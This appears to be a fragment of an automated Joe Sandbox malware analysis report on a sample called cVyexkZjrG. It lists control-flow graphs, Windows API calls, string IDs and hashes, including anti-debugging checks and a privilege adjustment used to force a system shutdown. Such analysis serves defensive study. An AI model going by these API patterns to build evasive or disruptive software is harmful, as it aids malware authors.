                            control_flow_graph 6824 6cc6cad3-6cc6cae3 6825 6cc6cae5-6cc6caf8 call 6cc5f9df call 6cc5f9cc 6824->6825 6826 6cc6cafd-6cc6caff 6824->6826 6840 6cc6ce7c 6825->6840 6827 6cc6ce64-6cc6ce71 call 6cc5f9df call 6cc5f9cc 6826->6827 6828 6cc6cb05-6cc6cb0b 6826->6828 6845 6cc6ce77 call 6cc60120 6827->6845 6828->6827 6830 6cc6cb11-6cc6cb37 6828->6830 6830->6827 6834 6cc6cb3d-6cc6cb46 6830->6834 6837 6cc6cb60-6cc6cb62 6834->6837 6838 6cc6cb48-6cc6cb5b call 6cc5f9df call 6cc5f9cc 6834->6838 6843 6cc6ce60-6cc6ce62 6837->6843 6844 6cc6cb68-6cc6cb6b 6837->6844 6838->6845 6846 6cc6ce7f-6cc6ce82 6840->6846 6843->6846 6844->6843 6848 6cc6cb71-6cc6cb75 6844->6848 6845->6840 6848->6838 6851 6cc6cb77-6cc6cb8e 6848->6851 6853 6cc6cb90-6cc6cb93 6851->6853 6854 6cc6cbdf-6cc6cbe5 6851->6854 6857 6cc6cb95-6cc6cb9e 6853->6857 6858 6cc6cba3-6cc6cba9 6853->6858 6855 6cc6cbe7-6cc6cbf1 6854->6855 6856 6cc6cbab-6cc6cbc2 call 6cc5f9df call 6cc5f9cc call 6cc60120 6854->6856 6861 6cc6cbf3-6cc6cbf5 6855->6861 6862 6cc6cbf8-6cc6cc16 call 6cc647f5 call 6cc647bb * 2 6855->6862 6890 6cc6cd97 6856->6890 6863 6cc6cc63-6cc6cc73 6857->6863 6858->6856 6859 6cc6cbc7-6cc6cbda 6858->6859 6859->6863 6861->6862 6894 6cc6cc33-6cc6cc5c call 6cc6ac69 6862->6894 6895 6cc6cc18-6cc6cc2e call 6cc5f9cc call 6cc5f9df 6862->6895 6865 6cc6cd38-6cc6cd41 call 6cc719e5 6863->6865 6866 6cc6cc79-6cc6cc85 6863->6866 6877 6cc6cdb4 6865->6877 6878 6cc6cd43-6cc6cd55 6865->6878 6866->6865 6870 6cc6cc8b-6cc6cc8d 6866->6870 6870->6865 6874 6cc6cc93-6cc6ccb7 6870->6874 6874->6865 6879 6cc6ccb9-6cc6cccf 6874->6879 6882 6cc6cdb8-6cc6cdd0 ReadFile 6877->6882 6878->6877 6884 6cc6cd57-6cc6cd66 GetConsoleMode 6878->6884 6879->6865 6885 6cc6ccd1-6cc6ccd3 6879->6885 6888 6cc6cdd2-6cc6cdd8 6882->6888 6889 6cc6ce2c-6cc6ce37 GetLastError 6882->6889 6884->6877 6891 6cc6cd68-6cc6cd6c 6884->6891 6885->6865 6886 6cc6ccd5-6cc6ccfb 6885->6886 6886->6865 6893 6cc6ccfd-6cc6cd13 6886->6893 6888->6889 6898 6cc6cdda 6888->6898 6896 
6cc6ce50-6cc6ce53 6889->6896 6897 6cc6ce39-6cc6ce4b call 6cc5f9cc call 6cc5f9df 6889->6897 6892 6cc6cd9a-6cc6cda4 call 6cc647bb 6890->6892 6891->6882 6899 6cc6cd6e-6cc6cd88 ReadConsoleW 6891->6899 6892->6846 6893->6865 6901 6cc6cd15-6cc6cd17 6893->6901 6894->6863 6895->6890 6908 6cc6cd90-6cc6cd96 call 6cc5f9f2 6896->6908 6909 6cc6ce59-6cc6ce5b 6896->6909 6897->6890 6905 6cc6cddd-6cc6cdef 6898->6905 6906 6cc6cd8a GetLastError 6899->6906 6907 6cc6cda9-6cc6cdb2 6899->6907 6901->6865 6911 6cc6cd19-6cc6cd33 6901->6911 6905->6892 6915 6cc6cdf1-6cc6cdf5 6905->6915 6906->6908 6907->6905 6908->6890 6909->6892 6911->6865 6919 6cc6cdf7-6cc6ce07 call 6cc6cefe 6915->6919 6920 6cc6ce0e-6cc6ce19 6915->6920 6932 6cc6ce0a-6cc6ce0c 6919->6932 6925 6cc6ce25-6cc6ce2a call 6cc6d1b6 6920->6925 6926 6cc6ce1b call 6cc6ce83 6920->6926 6930 6cc6ce20-6cc6ce23 6925->6930 6926->6930 6930->6932 6932->6892
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                            • Instruction ID: 95eb498d23126834f8adfd521a233fe94cd868d61c7f22007d90f928b16ef090
                            • Opcode Fuzzy Hash: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                            • Instruction Fuzzy Hash: F8C11670E04249AFEF01DFAAC9C0BADBBB4BF4A318F50418AE514A7F41E7709945CB64

                            Control-flow Graph
                            control_flow_graph: function 6cc7406c (calls GetFileType, GetLastError, CloseHandle); rendered graph and node/edge listing omitted
                            APIs
                              • Part of subcall function 6CC74457: CreateFileW.KERNEL32(00000000,00000000,?,6CC74115,?,?,00000000,?,6CC74115,00000000,0000000C), ref: 6CC74474
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC74180
                            • __dosmaperr.LIBCMT ref: 6CC74187
                            • GetFileType.KERNEL32(00000000), ref: 6CC74193
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7419D
                            • __dosmaperr.LIBCMT ref: 6CC741A6
                            • CloseHandle.KERNEL32(00000000), ref: 6CC741C6
                            • CloseHandle.KERNEL32(6CC6B0D0), ref: 6CC74313
                            • GetLastError.KERNEL32 ref: 6CC74345
                            • __dosmaperr.LIBCMT ref: 6CC7434C
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                            • Instruction ID: b438bed974e4e02bfa46ef60451f853d93095e8451da6d3908692b3133466af5
                            • Opcode Fuzzy Hash: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                            • Instruction Fuzzy Hash: 5FA16932A045449FDF19DF78C851BAE7BB4EB07328F180289E815EF780EB359816CB61

                            Control-flow Graph
                            control_flow_graph: function 6cc2c1e0 (calls WriteFile, ReadFile); rendered graph and node/edge listing omitted
                            Similarity
                            • API ID:
                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                            • API String ID: 0-4100612575
                            • Opcode ID: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                            • Instruction ID: b2a247bb0735d1ffb2a4393c01af9b5ace0a971587068865973efcaf29b040f4
                            • Opcode Fuzzy Hash: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                            • Instruction Fuzzy Hash: 25716CB0208345AFE710DF55C880BABBBF4FF8A708F10492EF498D6651E775D8589B92
                            Similarity
                            • API ID:
                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                            • API String ID: 0-174837320
                            • Opcode ID: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                            • Instruction ID: a44e052a5ece2cdfafd90f17ebf65e2684f10258098b36820e032a32bc644f89
                            • Opcode Fuzzy Hash: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                            • Instruction Fuzzy Hash: 064245B86093428FD754CF19C0A0A5ABBE1AFC9314F248D1EE5E6C7B21E638D845CB53
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                            • Instruction ID: 31a5a95c3efa9f2711f1ac14222f42e539cd1ad957b0f9bb1191c0d9416b5f0c
                            • Opcode Fuzzy Hash: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                            • Instruction Fuzzy Hash: 2303D471645B018FC728CF28C8D0695B7E3EFD532471D8B6DC0AA4BA95DB74B48ACB90

                            Control-flow Graph
                            control_flow_graph: function 6cc54ff0 (calls CreateProcessA, WaitForSingleObject, CloseHandle); rendered graph and node/edge listing omitted
                            Similarity
                            • API ID: CreateProcess
                            • String ID: D
                            • API String ID: 963392458-2746444292
                            • Opcode ID: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                            • Instruction ID: 86b314e4bb4218fa762bbd67af1dcab7ee8a835b9abd496f1f7d122ed4197100
                            • Opcode Fuzzy Hash: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                            • Instruction Fuzzy Hash: D63103708193408FE740DF29C19872ABBF0EB9A318F805A1DF4D986250E775D5A9CF47

                            Control-flow Graph
                            control_flow_graph: function 6cc6bc5e (calls WriteFile, GetLastError); rendered graph and node/edge listing omitted
                            APIs
                              • Part of subcall function 6CC6BEB1: GetConsoleCP.KERNEL32(?,6CC6B0D0,?), ref: 6CC6BEF9
                            • WriteFile.KERNEL32(?,?,6CC746EC,00000000,00000000,?,00000000,00000000,6CC75AB6,00000000,00000000,?,00000000,6CC6B0D0,6CC746EC,00000000), ref: 6CC6BDAF
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC6BDB9
                            • __dosmaperr.LIBCMT ref: 6CC6BDFE
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                            • Instruction ID: 7dd5b6805bea58a1330e6b1318cde70ca794635fa8c5c2f5ff69371e37da7e83
                            • Opcode Fuzzy Hash: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                            • Instruction Fuzzy Hash: A451B371A00609AFEB019FA6CAD0BEEBB79EF06318F540491F600ABE51F730994597A1

                            Control-flow Graph
                            control_flow_graph: function 6cc55b90 (internal calls only); rendered graph and node/edge listing omitted
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55D31
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                            • Instruction ID: 5eedbe1030bd1a6520c993e28e09f0f3d340d362c541e86e47cb939fc829aea2
                            • Opcode Fuzzy Hash: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                            • Instruction Fuzzy Hash: 1F5133B5901B408FD725CF29C485BA7BBF1FB48318F408A6DD8864BB90E775B919CB90

                            Control-flow Graph
                            control_flow_graph: function 6cc6b925 (calls CloseHandle, GetLastError); rendered graph and node/edge listing omitted
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC7425F), ref: 6CC6B97B
                            • GetLastError.KERNEL32(?,00000000,?,6CC7425F), ref: 6CC6B985
                            • __dosmaperr.LIBCMT ref: 6CC6B9B0
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID:
                            • API String ID: 2583163307-0
                            • Opcode ID: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                            • Instruction ID: 37634b799899b17af7265afe1f55f15634a9e69a34b6d9501c899387fe916815
                            • Opcode Fuzzy Hash: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                            • Instruction Fuzzy Hash: 4E010833A455201AD215063F96B57AE7BB99F83B3CF290259F91B97EC0FB60C8459260

                            Control-flow Graph
                            control_flow_graph: function 6cc60b9c (internal calls only); rendered graph and node/edge listing omitted
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: 255065eed86daa86ad1437724702a7dda79d75404a9f95ae480282aa1aaf5bb9
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: AFF0F932901A547AC6211A3B8F80BCB33989F8237CF100715E961A3ED0FB71D449C7AA
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AB4
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AF4
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                            • Instruction ID: 3744d6ea5a68e533d5dfffc8e520dd527278eca1211e4e23af249a22854736c2
                            • Opcode Fuzzy Hash: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                            • Instruction Fuzzy Hash: 56515871601B40DBD725CF25C485BE6BBF4FB04718F848A1CE4AA4BBA1EB34B559CB84
                            APIs
                            • GetLastError.KERNEL32(6CC86DD8,0000000C), ref: 6CC5EF52
                            • ExitThread.KERNEL32 ref: 6CC5EF59
                            Similarity
                            • API ID: ErrorExitLastThread
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: __wsopen_s
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: _free
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6CC74115,?,?,00000000,?,6CC74115,00000000,0000000C), ref: 6CC74474
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: CreateFile
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: _strlen
                            • String ID: g)''
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6CC55D6A
                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CC55D76
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CC55D84
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CC55DAB
                            • NtInitiatePowerAction.NTDLL ref: 6CC55DBF
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • String ID: \j`7$\j`7$j
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCE84B1
                              • Part of subcall function 6CCE993B: __EH_prolog.LIBCMT ref: 6CCE9940
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Similarity
                            • API ID: H_prolog
                            • String ID: 1$`)K$h)K
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCDAEF4
                              • Part of subcall function 6CCDE622: __EH_prolog.LIBCMT ref: 6CCDE627
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: $h%K
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: $J
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCB6CE5
                              • Part of subcall function 6CC8CC2A: __EH_prolog.LIBCMT ref: 6CC8CC2F
                              • Part of subcall function 6CC8E6A6: __EH_prolog.LIBCMT ref: 6CC8E6AB
                              • Part of subcall function 6CCB6A0E: __EH_prolog.LIBCMT ref: 6CCB6A13
                              • Part of subcall function 6CCB6837: __EH_prolog.LIBCMT ref: 6CCB683C
                              • Part of subcall function 6CCBA143: __EH_prolog.LIBCMT ref: 6CCBA148
                              • Part of subcall function 6CCBA143: ctype.LIBCPMT ref: 6CCBA16C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            Similarity
                            • API ID: H_prolog$ctype
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            Similarity
                            • String ID: 3J$`/J$`1J$p0J
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: W
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CC60279
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CC60283
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CC60290
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,6CC5F235,6CC59C49,00000003,00000000,6CC59C49,00000000), ref: 6CC5F19F
                            • TerminateProcess.KERNEL32(00000000,?,6CC5F235,6CC59C49,00000003,00000000,6CC59C49,00000000), ref: 6CC5F1A6
                            • ExitProcess.KERNEL32 ref: 6CC5F1B8
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCD489B
                              • Part of subcall function 6CCD5FC9: __EH_prolog.LIBCMT ref: 6CCD5FCE
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: @ K
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: x=J
                            APIs
                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CC578B0
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CC580D3
                              • Part of subcall function 6CC59379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CC580BC,00000000,?,?,?,6CC580BC,?,6CC8554C), ref: 6CC593D9
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            Similarity
                            • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                            • String ID:
                            • API String ID: 915016180-0
                            • Opcode ID: bd06c0d5f527937b9877de93068e3d0d2125bec46aae2a794c6654857dce121e
                            • Instruction ID: ab6053e1a93bb8e60a27ad75231134e688f843ca2ec73e0499ad9348443ac50f
                            • Opcode Fuzzy Hash: bd06c0d5f527937b9877de93068e3d0d2125bec46aae2a794c6654857dce121e
                            • Instruction Fuzzy Hash: 1EB1C071E142089BEF05CF55C891A9EBBB8FB05318FA4822ED515E7780E3349564CF94
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                            • Instruction ID: d1e1ff96c9642ae64a36565c918285b6323ac58323abbae7776640cb6639a922
                            • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                            • Instruction Fuzzy Hash: 3AB2CF30904798DFDB61CF69C4A4BDEBBF1BF04308F144599D4AA97A81E770A98ACF11
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: @4J$DsL
                            • API String ID: 0-2004129199
                            • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction ID: cd7f614dcd81b9cc8d958dddbe71fed7675f9edf99113f156027e170552efbcc
                            • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction Fuzzy Hash: 732191376A49564BD74CCA28EC33EB92681E744305B88527EEA4BCB7E1DF5C8800C648
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                            • Instruction ID: f82c903011fc63aba73aa1de71ce5aa6bdb6551e14f1f58ae95a2cd6211fbf65
                            • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                            • Instruction Fuzzy Hash: 8812F7B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EF898A7311D770E9568B86
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: __aullrem
                            • String ID:
                            • API String ID: 3758378126-0
                            • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction ID: 6a1039f966348a102b0958109663c6fe45f3bfe63206ae2c6b19d8b4a06e32e4
                            • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction Fuzzy Hash: 3151DA72A053859BD710CF5AC4C06EEFBF6EF79214F14C05EE8C897242E27A599AC760
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                            • Instruction ID: 83b3ca6d0c222a514c3c89c4b0366f530468d46f28fd04c2cacdcc2e376d5b0f
                            • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                            • Instruction Fuzzy Hash: 6ED13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: (SL
                            • API String ID: 0-669240678
                            • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction ID: 0e60ee00ef638e6fdfe9ea404192bd74ec3a8568704da214393f1407f4504c70
                            • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction Fuzzy Hash: DA518573E208214AD78CCF24DC21B7572D2E784310F8BC1B99D8BAB6E6DD78585587D4
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                            • Instruction ID: bc979a9f290eade82071b6bb6e4b28965a35edbfac04cbf7e36020a3477dd209
                            • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                            • Instruction Fuzzy Hash: E9727EB1A042168FD748CF18C490258FBE1FF89314B5A46ADD95ADB742EB71E896CBC0
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction ID: e8adc89264e1fcc13e2697627eb2f681b6e0f33b85f35d0c1bd6e8caca7af7e2
                            • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
